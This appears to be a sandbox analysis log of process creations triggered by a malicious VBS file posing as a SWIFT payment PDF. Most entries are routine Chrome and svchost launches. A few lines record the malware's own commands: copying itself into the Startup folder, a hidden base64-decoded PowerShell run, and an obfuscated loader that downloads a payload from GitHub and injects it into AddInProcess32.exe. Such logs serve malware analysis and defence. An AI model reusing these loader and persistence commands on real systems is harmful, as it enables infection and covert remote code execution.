            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2360,i,8934632438909745951,2213681595228066499,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2020,i,18065770690636922477,5919200967098741641,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1180,i,15662417021116800271,17959301878097503911,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1968,i,15358586014354363738,1738356423128360891,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2000,i,16637610320917934916,565223346788031028,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1184,i,1130476888448619373,4472464422477594584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2004,i,2937470017902191409,5218832269953484114,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2008,i,16121129215091139583,4677272960365539008,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,16982306025501434778,10627650727957162702,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2008,i,18146508179752881524,919200875560916846,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,15823624400460166783,6536935139452576376,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1964,i,5440842566350035257,10787203092068946937,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2032,i,11553977204438472227,7445186355205850417,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1988,i,7374315475741238408,2210743874770523791,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,3916554340437548015,1500443498568681016,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2016,i,9777007145685273446,11700763769562909530,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1968,i,9602569947055018222,14101658706447688223,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1492,i,7162340336741099282,8203552688004924699,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2012,i,3848042767598446159,15832118433102009625,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2028,i,15924250175209133703,8349155567450697044,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1728 --field-trial-handle=1980,i,7225582587041739135,14714490613506234970,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,8574600569835257597,12503451850514221727,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1648 --field-trial-handle=1996,i,18342384901192943427,3001916881733487027,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2008,i,13349874762832594225,9819071068630656309,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1984,i,11069439797262297707,896590743492590315,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2360,i,8934632438909745951,2213681595228066499,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2008,i,18146508179752881524,919200875560916846,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2000,i,16637610320917934916,565223346788031028,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2020,i,18065770690636922477,5919200967098741641,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1180,i,15662417021116800271,17959301878097503911,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1968,i,15358586014354363738,1738356423128360891,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1184,i,1130476888448619373,4472464422477594584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2004,i,2937470017902191409,5218832269953484114,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2008,i,16121129215091139583,4677272960365539008,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
